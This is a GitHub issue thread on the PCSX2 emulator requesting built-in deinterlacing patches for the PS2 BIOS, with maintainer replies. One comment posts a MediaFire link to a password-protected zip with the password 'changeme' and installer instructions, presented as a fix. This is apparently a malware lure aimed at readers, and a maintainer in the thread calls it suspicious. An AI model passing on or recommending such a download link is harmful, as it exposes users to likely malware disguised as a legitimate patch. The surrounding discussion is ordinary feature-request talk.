### ISSUE TITLE
[Feature Request]: Deinterlacing patches for the PS2 BIOS

### ISSUE THREAD

**Issue by DrAzathoth** [PCSX2/pcsx2#11758]
### Description

I would like baked-in deinterlacing patches for the PS2 BIOS. Normally, I would request this elsewhere in the case of a deinterlacing patch for a game, but since booting the BIOS isn't a game per se and can't be added via an external patch I feel like this is the place to make such a feature request.

### Reason

Since the BIOS boot is shown for every game when fast boot is disabled, there will be ugly interlacing artifacts every time you start a game. Deinterlacing patches would greatly improve the image quality. Since this would be a patch to the BIOS, it would also extend to the BIOS menu itself, which can't otherwise be patched.

### Examples

N/A

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RedPanda4552** [comment]
@Vomgnar if you are going to share a pnach file, do so plainly here. I have to assume you uploading an encrypted zip file on mediafire when it is absolutely not necessary to do so means you are trying to hide something.

**Comment by F0bes** [comment]
I don't really like the idea of having hard-coded deinterlacing patches for the many revisions and regions of OSDSYS. Maybe a better solution is to allow patches for the BIOS. The patches would probably have to be named after the BOOTROM ID.
